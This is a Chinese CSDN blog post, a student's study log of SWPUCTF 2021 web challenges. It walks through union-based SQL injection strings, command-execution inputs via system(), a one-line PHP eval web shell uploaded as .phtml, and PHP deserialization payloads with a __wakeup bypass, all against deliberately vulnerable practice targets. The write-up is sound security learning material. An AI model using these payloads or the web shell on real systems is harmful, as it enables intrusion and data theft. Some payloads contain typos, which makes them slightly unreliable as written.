学习记录1

已于 2023-11-24 22:44:55 修改
阅读量83 收藏
点赞数 1
文章标签: 学习 web安全
于 2023-11-24 22:38:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80028001/article/details/134583153
版权

来交周报咯(

目录

[SWPUCTF 2021 新生赛]jicao

[SWPUCTF 2021 新生赛]easy_sql

[SWPUCTF 2021 新生赛]easyrce 

 [SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]easyupload2.0

[SWPUCTF 2021 新生赛]no_wakeup

[SWPUCTF 2021 新生赛]jicao

先来道简单的,审码

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

 post和get请求,post就不说了,在配payload时,json_decode可以将json对象中json格式的字符串转换为php中的关联数组,所以json参数设置为:json={"x":"wllm"}

[SWPUCTF 2021 新生赛]easy_sql

再来看道sql注入的题目,sql注入是一种常见的网络应用程序安全漏洞,攻击者可以利用该漏洞,通过发送恶意sql代码,从数据库中获取敏感信息,修改或删除数据,或者对整个数据库造成破坏。

先根据题目要求传参,url/?wllm=1

接下来开始检查是否存在sql注入漏洞

接下来开始进行查询,发现一共有三列,your loginname应该在第二列, password在第三列

?wllm=-1' order by 3--+

?wllm=-1' oder by 4--+

//--+的作用是将整个注入攻击代码后的内容都注释掉,绕过过滤

查询数据库

?wllm=-1' union select 1,2,database()--+

接下来查询表名

?wllm=-1' union select 1,2,group concat(table_name)from information_schema.tables where table_schema='test_db'--+

//information_schema存储了数据库元数据信息,可以从这里查看表,列等信息

查询字段

?wllm=-1'union select 1,2,group_concat(column_name)from information_schema.columns where  table_name='test_tb'--+

接下来查询在test_tb库里查询flag ,然后就结束了

?wllm=-1'union select 1,2,flag from test_tb--+

[SWPUCTF 2021 新生赛]easyrce 

浅浅复习一下rce,这道题什么绕过也没有,那就直接传参执行命令

?url=system("ls ");

回根目录找找

?url=system("ls/");

 ?url=system("cat /flllllaaaaaaggggggg");

 [SWPUCTF 2021 新生赛]ez_unserialize

然后让我来复习一下反序列化,SHCTF没做出来,这次来道简单的

这里有robot.txt文件,访问

访问这个cl45s.php文件可以看到题目

 

审码,传参为p,发现include函数,我们要触发destruct方法,反序列化后自动触发,但是我们可以看到创建对象后construct方法会将admin和oasswd对象赋值

<?php
class wllm{

public $admin="admin";
public $passwd="ctf";

}
$a = new wllm;
echo serialize($a);
?>

得到poc链

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

传参

[SWPUCTF 2021 新生赛]easyupload2.0

文件上传

ctrl+u后没有发现什么有用的,上传个一句话木马试试

<?php @eval ($_POST[a]);?>

发现不能上传php文件

但可以上传phtml文件

用蚁剑链接一下

(请无视我上传的乱七八糟的东西)之后找到flag文件

[SWPUCTF 2021 新生赛]no_wakeup

绕过wake_up,之前在shctf见过一次

wake_up()方法会在反序列化时自动触发,绕过方法是在poc链中使成员数大于实际成员数

<?php

class HaHaHa {
    public $admin = "admin";
    public $passwd = "wllm";
}

$a = new HaHaHa();
echo serialize($a);
?>

payload:?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

之后就可以获得flag了

感谢阅读

escape233
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
yigo基础学习笔记1
qq_44154912的博客
11-16 1785
yigo学习笔记1 1.第一天 1.界面模型 2.
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
CNN学习笔记1
qq_35903679的博客
12-12 1734
cnn学习笔记1
Android Studio学习笔记1
dahuajuanzi的博客
03-25 2563
RelativeLayout padding background
foc学习笔记1——准备工作
热门推荐
jdhfusk的博客
09-20 1万+
foc学习笔记1——准备工作 写在前面:如今网上关于foc的文章和教程很多,但初学者往往会被那些专业且复杂的公式搞晕,不知道自己到底在学什么。而本文旨在帮助大家梳理思路,如果各位看了其他文章有云里雾里的感觉、不思其解的地方,或许本文能为您解惑。但本文也只能起到辅助作用,并不是零基础教程,还请结合其他文章一同学习。 最后:本人既不是电机工程师也不是相关专业的学生,纯属个人理解,有什么错误还请指出,也希望各位专业人士能嘴下留情。 1.foc是什么 (1)电机持续转动的秘密:换相 ​ 首先说一说为什么电机能
STM8学习笔记1:STM8简介
weixin_44965059的博客
03-04 2449
STM8学习
Massive MIMO 预编码学习笔记1
Vunerable的博客
07-09 5516
Massive MIMO 预编码学习笔记1欢迎使用Markdown编辑器对学习有帮助的网址仿真要点部分翻译(以供个人后续查看)码本的理解如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 开一个自己学习Massive MIMO的学习笔记,记录自己在这块儿学习的知识进展和个人理
sed学习笔记1
Edidaughter的博客
03-24 1226
0.引用 《Linux命令行与shell脚本编程大全.第3版 by 布鲁姆,布雷斯纳汉》第19章,第21章 1.今晚回家学习总结
docker学习笔记1
weixin_44107140的博客
01-29 1713
本笔记学习参考B站狂神说系列教程 什么是docker? 基于GO语言开发,开源项目,容器化技术 docker和虚拟机技术区别 传统虚拟机,虚拟出一套硬件,运行完整的操作系统,比如我们在虚拟机上面安装个centOS,是整套系统,然后可以在系统上安装和运行软件。 docker容器内应用直接运行在宿主机,容器没有自己的内核,也没有虚拟的硬件,使用轻便。 容器之间是隔离的,容器间有各自独立的文件系统,互不影响。 应用和优势 快速交付和部署: 传统:要安装一堆环境和程序 docker:打包镜像->发.
STM32学习笔记1
Be a friend of time and a lover of humanity !
01-09 2074
stm32学习笔记 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 1、定时器的分类 通用定时器主要功能: 1、基本的定时器功能,和基本定时器相同 2、PWM脉冲输出 3、测量输入脉冲的频率和脉冲宽度 2、定时器频率的计算 总结 提示:这里对文章进行总结: 例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数
Linux学习笔记1
Switch的博客
03-28 2418
Linux学习笔记1Linux学习笔记1配置网卡 配置详情 重启服务 配置DNS 配置详情 安装网络工具组件 CentOS 7中没有ifconfig命令而且不能发现eth0 centOS7在VirtualBox中装好后的网络连接问题 安装VIM配置网卡 vi /etc/sysconfig/network-scripts/ifcfg-* 配置详情 BOOTPROTO=static I
学习笔记1版(记录了linux,操作系统,计算机网络等笔记)
03-08
学习笔记1版(记录了linux,操作系统,计算机网络等笔记)
嵌入式开发学习笔记1-了解二极管
01-06
嵌入式开发学习笔记1-了解二极管前言二极管简介二极管的主要参数常用二极管整流二极管检波二极管稳压二极管激光二极管激光二极管的原理参考链接 前言 由于最近选修了嵌入式系统及电路的开发设计这门课,另外感觉未来...
spring学习笔记1
03-16
spring学习笔记1
Kaldi学习笔记1.md
01-21
Kaldi学习笔记1.md
学习笔记】卫星通信NTN 3GPP标准化进展分析(六)- 参考标准
u011376987的博客
09-01 1142
本文总结了NTN标准化进程以及后续的研究计划,是学习NTN协议的入门。本文来自3GPP Joern Krause, 3GPP MCC。
iomuxc、pinctrl子系统、gpio子系统(学习总结)
最新发布
weixin_61385844的博客
09-04 851
IOMUXC是SOC设计中实现引脚复用的关键组件,它通过动态切换引脚功能,提高了IO资源的利用率,满足了不同外设和功能的IO需求。在配置和使用IOMUXC时,需要参考芯片使用手册和设备树文档,确保引脚功能的正确设置。
Datawhale X 李宏毅苹果书AI夏令营 学习笔记
m0_61049596的博客
08-31 1312
今天,我继续学习了深度学习中的优化算法,并且着重理解了如何利用。等高级优化器来提高模型训练的效率和效果。2024年8月30日。
学习项目1
m0_62803606的博客
09-03 1601
这篇文章主要记录你最近入手的无线串口模块的配置情况,这是个很好的习惯,尤其是在你以后需要重复操作或排查问题时,会非常有帮助。- **DL_20无线串口模块**:这是一个常见的无线串口通信模块,通常基于nRF24L01+等无线通信芯片,支持点对点或多点通信,适合短距离的无线数据传输。是的,如果你按照步骤成功配置了两个模块并将它们连接到单机和电脑,当你在上位机软件(如SSCOM)上能稳定地接收到从单片机发送的数据(例如每秒输出的T值),就说明两个无线模块之间的通信已经配置成功。
Redis学习笔记1:安装和启动Redis的详细教程
Redis学习笔记1 在Redis学习笔记1中,我们首先介绍了安装Redis的步骤。我们提到了从官方网站http://redis.io/下载安装文件redis-4.0.2.tar.gz的过程,并介绍了使用命令tar -zvxf redis-4.0.2.tar.gz将安装文件解...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值